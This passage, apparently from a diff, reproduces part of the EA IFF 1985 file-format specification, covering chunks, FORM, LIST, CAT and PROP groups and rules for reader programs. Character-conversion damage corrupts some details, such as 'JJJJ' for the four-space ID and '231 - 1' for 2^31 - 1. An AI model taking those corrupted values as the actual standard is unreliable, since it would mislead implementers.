schedules. +So we also need a kind of decentralized extensibility where any software +developer can define and refine new object types without some "standards +authority" in the loop. Developers must be able to extend existing +formats in a forward- and backward-compatible way. A central repository +for design information and example programs can help us take full +advantage of the standard. + +For convenience, data formats should heed the restrictions of various +processors and environments. E.g. word-alignment greatly helps 68000 +access at insignificant cost to 8088 programs. + +Other goals include the ability to share common elements over a list +of objects and the ability to construct composite objects containing +other data objects with structural information like directories. + +And finally, "Simple things should be simple and complex things should +be possible." Alan Kay. + +Think Ahead + +Let's think ahead and build programs that read and write files for +each other and for programs yet to be designed. Build data formats +to last for future computers so long as the overhead is acceptable. +This extends the usefulness and life of today's programs and data. + +To maximize interconnectivity, the standard file structure and the +specific object formats must all be general and extensible. Think +ahead when designing an object. It should serve many purposes and +allow many programs to store and read back all the information they +need; even squeeze in custom data. Then a programmer can store the +available data and is encouraged to include fixed contextual details. +Recipient programs can read the needed parts, skip unrecognized stuff, +default missing data, and use the stored context to help transform +the data as needed. + +Scope + +IFF addresses these needs by defining a standard file structure, some +initial data object types, ways to define new types, and rules for +accessing these files. We can accomplish a great deal by writing programs +according to this standard, but don't expect direct compatibility +with existing software. We'll need conversion programs to bridge the +gap from the old world. + +IFF is geared for computers that readily process information in 8-bit +bytes. It assumes a "physical layer" of data storage and transmission +that reliably maintains "files" as strings of 8-bit bytes. The standard +treats a "file" as a container of data bytes and is independent of +how to find a file and whether it has a byte count. + +This standard does not by itself implement a clipboard for cutting +and pasting data between programs. A clipboard needs software to mediate +access, to maintain a "contents version number" so programs can detect +updates, and to manage the data in "virtual memory". + +Data Abstraction + +The basic problem is how to represent information in a way that's +program-independent, compiler- independent, machine-independent, and +device-independent. + +The computer science approach is "data abstraction", also known as +"objects", "actors", and "abstract data types". A data abstraction +has a "concrete representation" (its storage format), an "abstract +representation" (its capabilities and uses), and access procedures +that isolate all the calling software from the concrete representation. +Only the access procedures touch the data storage. Hiding mutable +details behind an interface is called "information hiding". What data +abstraction does is abstract from details of implementing the object, +namely the selected storage representation and algorithms for manipulating +it. + +The power of this approach is modularity. By adjusting the access +procedures we can extend and restructure the data without impacting +the interface or its callers. Conversely, we can extend and restructure +the interface and callers without making existing data obsolete. It's +great for interchange! + +But we seem to need the opposite: fixed file formats for all programs +to access. Actually, we could file data abstractions ("filed objects") +by storing the data and access procedures together. We'd have to encode +the access procedures in a standard machine-independent programming +language la PostScript. Even still, the interface can't evolve freely +since we can't update all copies of the access procedures. So we'll +have to design our abstract representations for limited evolution +and occasional revolution (conversion). + +In any case, today's microcomputers can't practically store data abstractions. +They can do the next best thing: store arbitrary types of data in +"data chunks", each with a type identifier and a length count. The +type identifier is a reference by name to the access procedures (any +local implementation). The length count enables storage-level object +operations like "copy" and "skip to next" independent of object type. + +Chunk writing is straightforward. Chunk reading requires a trivial +parser to scan each chunk and dispatch to the proper access/conversion +procedure. Reading chunks nested inside other chunks requires recursion, +but no lookahead or backup. + +That's the main idea of IFF. There are, of course, a few other detailsI + +Previous Work + +Where our needs are similar, we borrow from existing standards. + +Our basic need to move data between independently developed programs +is similar to that addressed by the Apple Macintosh desk scrap or +"clipboard" [Inside Macintosh chapter "Scrap Manager"]. The Scrap +Manager works closely with the Resource Manager, a handy filer and +swapper for data objects (text strings, dialog window templates, pictures, +fontsI) including types yet to be designed [Inside Macintosh chapter +"Resource Manager"]. The Resource Manager is a kin to Smalltalk's +object swapper. + +We will probably write a Macintosh desk accessory that converts IFF +files to and from the Macintosh clipboard for quick and easy interchange +with programs like MacPaint and Resource Mover. + +Macintosh uses a simple and elegant scheme of 4-character "identifiers" +to identify resource types, clipboard format types, file types, and +file creator programs. Alternatives are unique ID numbers assigned +by a central authority or by hierarchical authorities, unique ID numbers +generated by algorithm, other fixed length character strings, and +variable length strings. Character string identifiers double as readable +signposts in data files and programs. The choice of 4 characters is +a good tradeoff between storage space, fetch/compare/store time, and +name space size. We'll honor Apple's designers by adopting this scheme. + +"PICT" is a good example of a standard structured graphics format +(including raster images) and its many uses [Inside Macintosh chapter +"QuickDraw"]. Macintosh provides QuickDraw routines in ROM to create, +manipulate, and display PICTs. Any application can create a PICT by +simply asking QuickDraw to record a sequence of drawing commands. +Since it's just as easy to ask QuickDraw to render a PICT to a screen +or a printer, it's very effective to pass them between programs, say +from an illustrator to a word processor. An important feature is the +ability to store "comments" in a PICT which QuickDraw will ignore. +Actually, it passes them to your optional custom "comment handler". + +PostScript, Adobe's print file standard, is a more general way to +represent any print image (which is a specification for putting marks +on paper) [PostScript Language Manual]. In fact, PostScript is a full-fledged +programming language. To interpret a PostScript program is to render +a document on a raster output device. The language is defined in layers: +a lexical layer of identifiers, constants, and operators; a layer +of reverse polish semantics including scope rules and a way to define +new subroutines; and a printing-specific layer of built-in identifiers +and operators for rendering graphic images. It is clearly a powerful +(Turing equivalent) image definition language. PICT and a subset of +PostScript are candidates for structured graphics standards. + +A PostScript document can be printed on any raster output device (including +a display) but cannot generally be edited. That's because the original +flexibility and constraints have been discarded. Besides, a PostScript +program may use arbitrary computation to supply parameters like placement +and size to each operator. A QuickDraw PICT, in comparison, is a more +restricted format of graphic primitives parameterized by constants. +So a PICT can be edited at the level of the primitives, e.g. move +or thicken a line. It cannot be edited at the higher level of, say, +the bar chart data which generated the picture. + +PostScript has another limitation: Not all kinds of data amount to +marks on paper. A musical instrument description is one example. PostScript +is just not geared for such uses. + +"DIF" is another example of data being stored in a general format +usable by future programs [DIF Technical Specification]. DIF is a +format for spreadsheet data interchange. DIF and PostScript are both +expressed in plain ASCII text files. This is very handy for printing, +debugging, experimenting, and transmitting across modems. It can have +substantial cost in compaction and read/write work, depending on use. +We won't store IFF files this way but we could define an ASCII alternate +representation with a converter program. + +InterScript is Xerox' standard for interchange of editable documents +[Introduction to InterScript]. It approaches a harder problem: How +to represent editable word processor documents that may contain formatted +text, pictures, cross-references like figure numbers, and even highly +specialized objects like mathematical equations? InterScript aims +to define one standard representation for each kind of information. +Each InterScript-compatible editor is supposed to preserve the objects +it doesn't understand and even maintain nested cross-references. So +a simple word processor would let you edit the text of a fancy document +without discarding the equations or disrupting the equation numbers. + +Our task is similarly to store high level information and preserve +as much content as practical while moving it between programs. But +we need to span a larger universe of data types and cannot expect +to centrally define them all. Fortunately, we don't need to make programs +preserve information that they don't understand. And for better or +worse, we don't have to tackle general-purpose cross-references yet. + + + +3. Primitive Data Types + +Atomic components such as integers and characters that are interpretable +directly by the CPU are specified in one format for all processors. +We chose a format that's most convenient for the Motorola MC68000 +processor [M68000 16/32-Bit Microprocessor Programmer's Reference +Manual]. + +N.B.: Part 3 dictates the format for "primitive" data types where and +only where used in the overall file structure and standard kinds of +chunks (Cf. Chunks). The number of such occurrences will be small +enough that the costs of conversion, storage, and management of processor- +specific files would far exceed the costs of conversion during I/O by "foreign" +programs. A particular data chunk may be specified with a different +format for its internal primitive types or with processor- or environment- +speci fic variants if necessary to optimize local usage. Since that hurts +data interchange, it's not recommended. (Cf. Designing New Data Sections, +in Part 4.) + +Alignment + +All data objects larger than a byte are aligned on even byte addresses +relative to the start of the file. This may require padding. Pad bytes +are to be written as zeros, but don't count on that when reading. + +This means that every odd-length "chunk" (see below) must be padded +so that the next one will fall on an even boundary. Also, designers +of structures to be stored in chunks should include pad fields where +needed to align every field larger than a byte. Zeros should be stored +in all the pad bytes. + +Justification: Even-alignment causes a little extra work for files +that are used only on certain processors but allows 68000 programs +to construct and scan the data in memory and do block I/O. You just +add an occasional pad field to data structures that you're going to +block read/write or else stream read/write an extra byte. And the +same source code works on all processors. Unspecified alignment, on +the other hand, would force 68000 programs to (dis)assemble word and +long-word data one byte at a time. Pretty cumbersome in a high level +language. And if you don't conditionally compile that out for other +processors, you won't gain anything. + +Numbers + +Numeric types supported are two's complement binary integers in the +format used by the MC68000 processor high byte first, high word first the +reverse of 8088 and 6502 format. They could potentially include signed +and unsigned 8, 16, and 32 bit integers but the standard only uses +the following: + +UBYTE 8 bits unsigned +WORD 16 bits signed +UWORD 16 bits unsigned +LONG 32 bits signed + +The actual type definitions depend on the CPU and the compiler. In +this document, we'll express data type definitions in the C programming +language. [See C, A Reference Manual.] In 68000 Lattice C: + +typedef unsigned char UBYTE; /* 8 bits unsigned */ +typedef short WORD; /* 16 bits signed */ +typedef unsigned short UWORD; /* 16 bits unsigned */ +typedef long LONG; /* 32 bits signed */ + +Characters + +The following character set is assumed wherever characters are used, +e.g. in text strings, IDs, and TEXT chunks (see below). + +Characters are encoded in 8-bit ASCII. Characters in the range NUL +(hex 0) through DEL (hex 7F) are well defined by the 7-bit ASCII standard. +IFF uses the graphic group RJS (SP, hex 20) through R~S (hex 7E). + +Most of the control character group hex 01 through hex 1F have no +standard meaning in IFF. The control character LF (hex 0A) is defined +as a "newline" character. It denotes an intentional line break, that +is, a paragraph or line terminator. (There is no way to store an automatic +line break. That is strictly a function of the margins in the environment +the text is placed.) The control character ESC (hex 1B) is a reserved +escape character under the rules of ANSI standard 3.64-1979 American +National Standard Additional Control Codes for Use with ASCII, ISO +standard 2022, and ISO/DIS standard 6429.2. + +Characters in the range hex 7F through hex FF are not globally defined +in IFF. They are best left reserved for future standardization. But +note that the FORM type FTXT (formatted text) defines the meaning +of these characters within FTXT forms. In particular, character values +hex 7F through hex 9F are control codes while characters hex A0 through +hex FF are extended graphic characters like , as per the ISO and +ANSI standards cited above. [See the supplementary document "FTXT" +IFF Formatted Text.] + +Dates + +A "creation date" is defined as the date and time a stream of data +bytes was created. (Some systems call this a "last modified date".) +Editing some data changes its creation date. Moving the data between +volumes or machines does not. + +The IFF standard date format will be one of those used in MS-DOS, +Macintosh, or Amiga DOS (probably a 32-bit unsigned number of seconds +since a reference point). Issue: Investigate these three. + +Type IDs + +A "type ID", "property name", "FORM type", or any other IFF identifier +is a 32-bit value: the concatenation of four ASCII characters in the +range R S (SP, hex 20) through R~S (hex 7E). Spaces (hex 20) should +not precede printing characters; trailing spaces are ok. Control characters +are forbidden. + +typedef CHAR ID[4]; + +IDs are compared using a simple 32-bit case-dependent equality test. + +Data section type IDs (aka FORM types) are restriced IDs. (Cf. Data +Sections.) Since they may be stored in filename extensions (Cf. Single +Purpose Files) lower case letters and punctuation marks are forbidden. +Trailing spaces are ok. + +Carefully choose those four characters when you pick a new ID. Make +them mnemonic so programmers can look at an interchange format file +and figure out what kind of data it contains. The name space makes +it possible for developers scattered around the globe to generate +ID values with minimal collisions so long as they choose specific +names like "MUS4" instead of general ones like "TYPE" and "FILE". +EA will "register" new FORM type IDs and format descriptions as they're +devised, but collisions will be improbable so there will be no pressure +on this "clearinghouse" process. Appendix A has a list of currently +defined IDs. + +Sometimes it's necessary to make data format changes that aren't backward +compatible. Since IDs are used to denote data formats in IFF, new +IDs are chosen to denote revised formats. Since programs won't read +chunks whose IDs they don't recognize (see Chunks, below), the new +IDs keep old programs from stumbling over new data. The conventional +way to chose a "revision" ID is to increment the last character if +it's a digit or else change the last character to a digit. E.g. first +and second revisions of the ID "XY" would be "XY1" and "XY2". Revisions +of "CMAP" would be "CMA1" and "CMA2". + +Chunks + +Chunks are the building blocks in the IFF structure. The form expressed +as a C typedef is: + +typedef struct { + ID ckID; + LONG ckSize; /* sizeof(ckData) */ + UBYTE ckData[/* ckSize */]; + } Chunk; + +We can diagram an example chunk a "CMAP" chunk containing 12 data +bytes like this: + ---------------- + ckID: | 'CMAP' | + ckSize: | 12 | + ckData: | 0, 0, 0, 32 | -------- + | 0, 0, 64, 0 | 12 bytes + | 0, 0, 64, 0 | --------- + ---------------- + +The fixed header part means "Here's a type ckID chunk with ckSize +bytes of data." + +The ckID identifies the format and purpose of the chunk. As a rule, +a program must recognize ckID to interpret ckData. It should skip +over all unrecognized chunks. The ckID also serves as a format version +number as long as we pick new IDs to identify new formats of ckData +(see above). + +The following ckIDs are universally reserved to identify chunks with +particular IFF meanings: "LIST", "FORM", "PROP", "CAT ", and " +". The special ID " " (4 spaces) is a ckID for "filler" chunks, +that is, chunks that fill space but have no meaningful contents. The +IDs "LIS1" through "LIS9", "FOR1" through "FOR9", and "CAT1" through +"CAT9" are reserved for future "version number" variations. All IFF-compatible +software must account for these 23 chunk IDs. Appendix A has a list +of predefined IDs. + +The ckSize is a logical block size how many data bytes are in ckData. +If ckData is an odd number of bytes long, a 0 pad byte follows which +is not included in ckSize. (Cf. Alignment.) A chunk's total physical +size is ckSize rounded up to an even number plus the size of the header. +So the smallest chunk is 8 bytes long with ckSize = 0. For the sake +of following chunks, programs must respect every chunk's ckSize as +a virtual end-of-file for reading its ckData even if that data is +malformed, e.g. if nested contents are truncated. + +We can describe the syntax of a chunk as a regular expression with +"#" representing the ckSize, i.e. the length of the following {braced} +bytes. The "[0]" represents a sometimes needed pad byte. (The regular +expressions in this document are collected in Appendix A along with +an explanation of notation.) + +Chunk ::= ID #{ UBYTE* } [0] + +One chunk output technique is to stream write a chunk header, stream +write the chunk contents, then random access back to the header to +fill in the size. Another technique is to make a preliminary pass +over the data to compute the size, then write it out all at once. + +Strings, String Chunks, and String Properties + +In a string of ASCII text, LF denotes a forced line break (paragraph +or line terminator). Other control characters are not used. (Cf. Characters.) + +The ckID for a chunk that contains a string of plain, unformatted +text is "TEXT". As a practical matter, a text string should probably +not be longer than 32767 bytes. The standard allows up to 231 - 1 +bytes. + +When used as a data property (see below), a text string chunk may +be 0 to 255 characters long. Such a string is readily converted to +a C string or a Pascal STRING[255]. The ckID of a property must be +the property name, not "TEXT". + +When used as a part of a chunk or data property, restricted C string +format is normally used. That means 0 to 255 characters followed by +a NUL byte (ASCII value 0). + +Data Properties + +Data properties specify attributes for following (non-property) chunks. +A data property essentially says "identifier = value", for example +"XY = (10, 200)", telling something about following chunks. Properties +may only appear inside data sections ("FORM" chunks, cf. Data Sections) +and property sections ("PROP" chunks, cf. Group PROP). + +The form of a data property is a special case of Chunk. The ckID is +a property name as well as a property type. The ckSize should be small +since data properties are intended to be accumulated in RAM when reading +a file. (256 bytes is a reasonable upper bound.) Syntactically: + +Property ::= Chunk + +When designing a data object, use properties to describe context information +like the size of an image, even if they don't vary in your program. +Other programs will need this information. + +Think of property settings as assignments to variables in a programming +language. Multiple assignments are redundant and local assignments +temporarily override global assignments. The order of assignments +doesn't matter as long as they precede the affected chunks. (Cf. LISTs, +CATs, and Shared Properties.) + +Each object type (FORM type) is a local name space for property IDs. +Think of a "CMAP" property in a "FORM ILBM" as the qualified ID "ILBM.CMAP". +Property IDs specified when an object type is designed (and therefore +known to all clients) are called "standard" while specialized ones +added later are "nonstandard". + +Links + +Issue: A standard mechanism for "links" or "cross references" is very +desirable for things like combining images and sounds into animations. +Perhaps we'll define "link" chunks within FORMs that refer to other +FORMs or to specific chunks within the same and other FORMs. This +needs further work. EA IFF 1985 has no standard link mechanism. + +For now, it may suffice to read a list of, say, musical instruments, +and then just refer to them within a musical score by index number. + +File References + +Issue: We may need a standard form for references to other files. +A "file ref" could name a directory and a file in the same type of +operating system as the ref's originator. Following the reference +would expect the file to be on some mounted volume. In a network environment, +a file ref could name a server, too. + +Issue: How can we express operating-system independent file refs? + +Issue: What about a means to reference a portion of another file? +Would this be a "file ref" plus a reference to a "link" within the +target file? + + + +4. Data Sections + +The first thing we need of a file is to check: Does it contain IFF +data and, if so, does it contain the kind of data we're looking for? +So we come to the notion of a "data section". + +A "data section" or IFF "FORM" is one self-contained "data object" +that might be stored in a file by itself. It is one high level data +object such as a picture or a sound effect. The IFF structure "FORM" +makes it self- identifying. It could be a composite object like a +musical score with nested musical instrument descriptions. + +Group FORM + +A data section is a chunk with ckID "FORM" and this arrangement: + +FORM ::= "FORM" #{ FormType (LocalChunk | FORM | LIST | CAT)* +} +FormType ::= ID +LocalChunk ::= Property | Chunk + +The ID "FORM" is a syntactic keyword like "struct" in C. Think of +a "struct ILBM" containing a field "CMAP". If you see "FORM" you'll +know to expect a FORM type ID (the structure name, "ILBM" in this +example) and a particular contents arrangement or "syntax" (local +chunks, FORMs, LISTs, and CATs). (LISTs and CATs are discussed in +part 5, below.) A "FORM ILBM", in particular, might contain a local +chunk "CMAP", an "ILBM.CMAP" (to use a qualified name). + +So the chunk ID "FORM" indicates a data section. It implies that the +chunk contains an ID and some number of nested chunks. In reading +a FORM, like any other chunk, programs must respect its ckSize as +a virtual end-of-file for reading its contents, even if they're truncated. + +The FormType (or FORM type) is a restricted ID that may not contain +lower case letters or punctuation characters. (Cf. Type IDs. Cf. Single +Purpose Files.) + +The type-specific information in a FORM is composed of its "local +chunks": data properties and other chunks. Each FORM type is a local +name space for local chunk IDs. So "CMAP" local chunks in other FORM +types may be unrelated to "ILBM.CMAP". More than that, each FORM type +defines semantic scope. If you know what a FORM ILBM is, you'll know +what an ILBM.CMAP is. + +Local chunks defined when the FORM type is designed (and therefore +known to all clients of this type) are called "standard" while specialized +ones added later are "nonstandard". + +Among the local chunks, property chunks give settings for various +details like text font while the other chunks supply the essential +information. This distinction is not clear cut. A property setting +cancelled by a later setting of the same property has effect only +on data chunks in between. E.g. in the sequence: + +prop1 = x (propN = value)* prop1 = y + +where the propNs are not prop1, the setting prop1 = x has no effect. + +The following universal chunk IDs are reserved inside any FORM: "LIST", +"FORM", "PROP", "CAT ", "JJJJ", "LIS1" through "LIS9", "FOR1" through +"FOR9", and "CAT1" through "CAT9". (Cf. Chunks. Cf. Group LIST. Cf. +Group PROP.) For clarity, these universal chunk names may not be FORM +type IDs, either. + +Part 5, below, talks about grouping FORMs into LISTs and CATs. They +let you group a bunch of FORMs but don't impose any particular meaning +or constraints on the grouping. Read on. + +Composite FORMs + +A FORM chunk inside a FORM is a full-fledged data section. This means +you can build a composite object like a multi-frame animation sequence +from available picture FORMs and sound effect FORMs. You can insert +additional chunks with information like frame rate and frame count. + +Using composite FORMs, you leverage on existing programs that create +and edit the component FORMs. Those editors may even look into your +composite object to copy out its type of component, although it'll +be the rare program that's fancy enough to do that. Such editors are +not allowed to replace their component objects within your composite +object. That's because the IFF standard lets you specify consistency +requirements for the composite FORM such as maintaining a count or +a directory of the components. Only programs that are written to uphold +the rules of your FORM type should create or modify such FORMs. + +Therefore, in designing a program that creates composite objects, +you are strongly requested to provide a facility for your users to +import and export the nested FORMs. Import and export could move the +data through a clipboard or a file. + +Here are several existing FORM types and rules for defining new ones. + +FTXT + +An FTXT data section contains text with character formatting information +like fonts and faces. It has no paragraph or document formatting information +like margins and page headers. FORM FTXT is well matched to the text +representation in Amiga's Intuition environment. See the supplemental +document "FTXT" IFF Formatted Text. + +ILBM + +"ILBM" is an InterLeaved BitMap image with color map; a machine-independent +format for raster images. FORM ILBM is the standard image file format +for the Commodore-Amiga computer and is useful in other environments, +too. See the supplemental document "ILBM" IFF Interleaved Bitmap. + +PICS + +The data chunk inside a "PICS" data section has ID "PICT" and holds +a QuickDraw picture. Issue: Allow more than one PICT in a PICS? See +Inside Macintosh chapter "QuickDraw" for details on PICTs and how +to create and display them on the Macintosh computer. + +The only standard property for PICS is "XY", an optional property +that indicates the position of the PICT relative to "the big picture". +The contents of an XY is a QuickDraw Point. + +Note: PICT may be limited to Macintosh use, in which case there'll +be another format for structured graphics in other environments. + +Other Macintosh Resource Types + +Some other Macintosh resource types could be adopted for use within +IFF files; perhaps MWRT, ICN, ICN#, and STR#. + +Issue: Consider the candidates and reserve some more IDs. + +Designing New Data Sections + +Supplemental documents will define additional object types. A supplement +needs to specify the object's purpose, its FORM type ID, the IDs and +formats of standard local chunks, and rules for generating and interpreting +the data. It's a good idea to supply typedefs and an example source +program that accesses the new object. See "ILBM" IFF Interleaved Bitmap +for a good example. + +Anyone can pick a new FORM type ID but should reserve it with Electronic +Arts at their earliest convenience. [Issue: EA contact person? Hand +this off to another organization?] While decentralized format definitions +and extensions are possible in IFF, our preference is to get design +consensus by committee, implement a program to read and write it, +perhaps tune the format, and then publish the format with example +code. Some organization should remain in charge of answering questions +and coordinating extensions to the format. + +If it becomes necessary to revise the design of some data section, +its FORM type ID will serve as a version number (Cf. Type IDs). E.g. +a revised "VDEO" data section could be called "VDE1". But try to get +by with compatible revisions within the existing FORM type. + +In a new FORM type, the rules for primitive data types and word-alignment +(Cf. Primitive Data Types) may be overriden for the contents of its +local chunks but not for the chunk structure itself if your documentation +spells out the deviations. If machine-specific type variants are needed, +e.g. to store vast numbers of integers in reverse bit order, then +outline the conversion algorithm and indicate the variant inside each +file, perhaps via different FORM types. Needless to say, variations +should be minimized. + +In designing a FORM type, encapsulate all the data that other programs +will need to interpret your files. E.g. a raster graphics image should +specify the image size even if your program always uses 320 x 200 +pixels x 3 bitplanes. Receiving programs are then empowered to append +or clip the image rectangle, to add or drop bitplanes, etc. This enables +a lot more compatibility. + +Separate the central data (like musical notes) from more specialized +information (like note beams) so simpler programs can extract the +central parts during read-in. Leave room for expansion so other programs +can squeeze in new kinds of information (like lyrics). And remember +to keep the property chunks manageably short let's say 2 256 bytes. + +When designing a data object, try to strike a good tradeoff between +a super-general format and a highly-specialized one. Fit the details +to at least one particular need, for example a raster image might +as well store pixels in the current machine's scan order. But add +the kind of generality that makes it usable with foreseeable hardware +and software. E.g. use a whole byte for each red, green, and blue +color value even if this year's computer has only 4-bit video DACs. +Think ahead and help other programs so long as the overhead is acceptable. +E.g. run compress a raster by scan line rather than as a unit so future +programs can swap images by scan line to and from secondary storage. + +Try to design a general purpose "least common multiple" format that +encompasses the needs of many programs without getting too complicated. +Let's coalesce our uses around a few such formats widely separated +in the vast design space. Two factors make this flexibility and simplicity +practical. First, file storage space is getting very plentiful, so +compaction is not a priority. Second, nearly any locally-performed +data conversion work during file reading and writing will be cheap +compared to the I/O time. + +It must be ok to copy a LIST or FORM or CAT intact, e.g. to incorporate +it into a composite FORM. So any kind of internal references within +a FORM must be relative references. They could be relative to the +start of the containing FORM, relative from the referencing chunk, +or a sequence number into a collection. + +With composite FORMs, you leverage on existing programs that create +and edit the components. If you write a program that creates composite +objects, please provide a facility for your users to import and export +the nested FORMs. The import and export functions may move data through +a separate file or a clipboard. + +Finally, don't forget to specify all implied rules in detail. + + + +5. LISTs, CATs, and Shared Properties + +Data often needs to be grouped together like a list of icons. Sometimes +a trick like arranging little images into a big raster works, but +generally they'll need to be structured as a first class group. The +objects "LIST" and "CAT" are IFF-universal mechanisms for this purpose. + +Property settings sometimes need to be shared over a list of similar +objects. E.g. a list of icons may share one color map. LIST provides +a means called "PROP" to do this. One purpose of a LIST is to define +the scope of a PROP. A "CAT", on the other hand, is simply a concatenation +of objects. + +Simpler programs may skip LISTs and PROPs altogether and just handle +FORMs and CATs. All "fully-conforming" IFF programs also know about +"CAT ", "LIST", and "PROP". Any program that reads a FORM inside a +LIST must process shared PROPs to correctly interpret that FORM. + +Group CAT + +A CAT is just an untyped group of data objects. + +Structurally, a CAT is a chunk with chunk ID "CAT " containing a "contents +type" ID followed by the nested objects. The ckSize of each contained +chunk is essentially a relative pointer to the next one. + +CAT ::= "CAT " #{ ContentsType (FORM | LIST | CAT)* } +ContentsType ::= ID -- a hint or an "abstract data type" ID + +In reading a CAT, like any other chunk, programs must respect it's +ckSize as a virtual end-of-file for reading the nested objects even +if they're malformed or truncated. + +The "contents type" following the CAT's ckSize indicates what kind +of FORMs are inside. So a CAT of ILBMs would store "ILBM" there. It's +just a hint. It may be used to store an "abstract data type". A CAT +could just have blank contents ID ("JJJJ") if it contains more than +one kind of FORM. + +CAT defines only the format of the group. The group's meaning is open +to interpretation. This is like a list in LISP: the structure of cells +is predefined but the meaning of the contents as, say, an association +list depends on use. If you need a group with an enforced meaning +(an "abstract data type" or Smalltalk "subclass"), some consistency +constraints, or additional data chunks, use a composite FORM instead +(Cf. Composite FORMs). + +Since a CAT just means a concatenation of objects, CATs are rarely +nested. Programs should really merge CATs rather than nest them. + +Group LIST + +A LIST defines a group very much like CAT but it also gives a scope +for PROPs (see below). And unlike CATs, LISTs should not be merged +without understanding their contents. + +Structurally, a LIST is a chunk with ckID "LIST" containing a "contents +type" ID, optional shared properties, and the nested contents (FORMs, +LISTs, and CATs), in that order. The ckSize of each contained chunk +is a relative pointer to the next one. A LIST is not an arbitrary +linked list the cells are simply concatenated. + +LIST ::= "LIST" #{ ContentsType PROP* (FORM | LIST | CAT)* } +ContentsType ::= ID + +Group PROP + +PROP chunks may appear in LISTs (not in FORMs or CATs). They supply +shared properties for the FORMs in that LIST. This ability to elevate +some property settings to shared status for a list of forms is useful +for both indirection and compaction. E.g. a list of images with the +same size and colors can share one "size" property and one "color +map" property. Individual FORMs can override the shared settings. + +The contents of a PROP is like a FORM with no data chunks: + +PROP ::= "PROP" #{ FormType Property* } + +It means, "Here are the shared properties for FORM type <." + +A LIST may have at most one PROP of a FORM type, and all the PROPs +must appear before any of the FORMs or nested LISTs and CATs. You +can have subsequences of FORMs sharing properties by making each subsequence +a LIST. + +Scoping: Think of property settings as variable bindings in nested +blocks of a programming language. Where in C you could write: + +TEXT_FONT text_font = Courier; /* program's global default */ + +File(); { + TEXT_FONT text_font = TimesRoman; /* shared setting */ + + { + TEXT_FONT text_font = Helvetica; /* local setting */ + Print("Hello "); /* uses font Helvetica */ + } + + { + Print("there."); /* uses font TimesRoman */ + } + } + +An IFF file could contain: + +LIST { + PROP TEXT { + FONT {TimesRoman} /* shared setting */ + } + + FORM TEXT { + FONT {Helvetica} /* local setting */ + CHRS {Hello } /* uses font Helvetica */ + } + + FORM TEXT { + CHRS {there.} /* uses font TimesRoman */ + } + } + +The shared property assignments selectively override the reader's +global defaults, but only for FORMs within the group. A FORM's own +property assignments selectively override the global and group-supplied +values. So when reading an IFF file, keep property settings on a stack. +They're designed to be small enough to hold in main memory. + +Shared properties are semantically equivalent to copying those properties +into each of the nested FORMs right after their FORM type IDs. + +Properties for LIST + +Optional "properties for LIST" store the origin of the list's contents +in a PROP chunk for the fake FORM type "LIST". They are the properties +originating program "OPGM", processor family "OCPU", computer type +"OCMP", computer serial number or network address "OSN ", and user +name "UNAM". In our imperfect world, these could be called upon to +distinguish between unintended variations of a data format or to work +around bugs in particular originating/receiving program pairs. Issue: +Specify the format of these properties. + +A creation date could also be stored in a property but let's ask that +file creating, editing, and transporting programs maintain the correct +date in the local file system. Programs that move files between machine +types are expected to copy across the creation dates. + + + +6. Standard File Structure + +File Structure Overview + +An IFF file is just a single chunk of type FORM, LIST, or CAT. Therefore +an IFF file can be recognized by its first 4 bytes: "FORM", "LIST", +or "CAT ". Any file contents after the chunk's end are to be ignored. + +Since an IFF file can be a group of objects, programs that read/write +single objects can communicate to an extent with programs that read/write +groups. You're encouraged to write programs that handle all the objects +in a LIST or CAT. A graphics editor, for example, could process a +list of pictures as a multiple page document, one page at a time. + +Programs should enforce IFF's syntactic rules when reading and writing +files. This ensures robust data transfer. The public domain IFF reader/writer +subroutine package does this for you. A utility program "IFFCheck" +is available that scans an IFF file and checks it for conformance +to IFF's syntactic rules. IFFCheck also prints an outline of the chunks +in the file, showing the ckID and ckSize of each. This is quite handy +when building IFF programs. Example programs are also available to +show details of reading and writing IFF files. + +A merge program "IFFJoin" will be available that logically appends +IFF files into a single CAT group. It "unwraps" each input file that +is a CAT so that the combined file isn't nested CATs. + +If we need to revise the IFF standard, the three anchoring IDs will +be used as "version numbers". That's why IDs "FOR1" through "FOR9", +"LIS1" through "LIS9", and "CAT1" through "CAT9" are reserved. + +IFF formats are designed for reasonable performance with floppy disks. +We achieve considerable simplicity in the formats and programs by +relying on the host file system rather than defining universal grouping +structures like directories for LIST contents. On huge storage systems, +IFF files could be leaf nodes in a file structure like a B-tree. Let's +hope the host file system implements that for us! + +Thre are two kinds of IFF files: single purpose files and scrap files. +They differ in the interpretation of multiple data objects and in +the file's external type. + +Single Purpose Files + +A single purpose IFF file is for normal "document" and "archive" storage. +This is in contrast with "scrap files" (see below) and temporary backing +storage (non-interchange files). + +The external file type (or filename extension, depending on the host +file system) indicates the file's contents. It's generally the FORM +type of the data contained, hence the restrictions on FORM type IDs. + +Programmers and users may pick an "intended use" type as the filename +extension to make it easy to filter for the relevant files in a filename +requestor. This is actually a "subclass" or "subtype" that conveniently +separates files of the same FORM type that have different uses. Programs +cannot demand conformity to its expected subtypes without overly restricting +data interchange since they cannot know about the subtypes to be used +by future programs that users will want to exchange data with. + +Issue: How to generate 3-letter MS-DOS extensions from 4-letter FORM +type IDs? + +Most single purpose files will be a single FORM (perhaps a composite +FORM like a musical score containing nested FORMs like musical instrument +descriptions). If it's a LIST or a CAT, programs should skip over +unrecognized objects to read the recognized ones or the first recognized +one. Then a program that can read a single purpose file can read something +out of a "scrap file", too. + +Scrap Files + +A "scrap file" is for maximum interconnectivity in getting data between +programs; the core of a clipboard function. Scrap files may have type +"IFF " or filename extension ".IFF". + +A scrap file is typically a CAT containing alternate representations +of the same basic information. Include as many alternatives as you +can readily generate. This redundancy improves interconnectivity in +situations where we can't make all programs read and write super-general +formats. [Inside Macintosh chapter "Scrap Manager".] E.g. a graphically- +annotated musical score might be supplemented by a stripped down 4-voice +melody and by a text (the lyrics). + +The originating program should write the alternate representations +in order of "preference": most preferred (most comprehensive) type +to least preferred (least comprehensive) type. A receiving program +should either use the first appearing type that it understands or +search for its own "preferred" type. + +A scrap file should have at most one alternative of any type. (A LIST +of same type objects is ok as one of the alternatives.) But don't +count on this when reading; ignore extra sections of a type. Then +a program that reads scrap files can read something out of single +purpose files. + +Rules for Reader Programs + +Here are some notes on building programs that read IFF files. If you +use the standard IFF reader module "IFFR.C", many of these rules and +details will be automatically handled. (See "Support Software" in +Appendix A.) We recommend that you start from the example program +"ShowILBM.C". You should also read up on recursive descent parsers. +[See, for example, Compiler Construction, An Advanced Course.] + +% The standard is very flexible so many programs can exchange +data. This implies a program has to scan the file and react to what's +actually there in whatever order it appears. An IFF reader program +is a parser. + +% For interchange to really work, programs must be willing to +do some conversion during read-in. If the data isn't exactly what 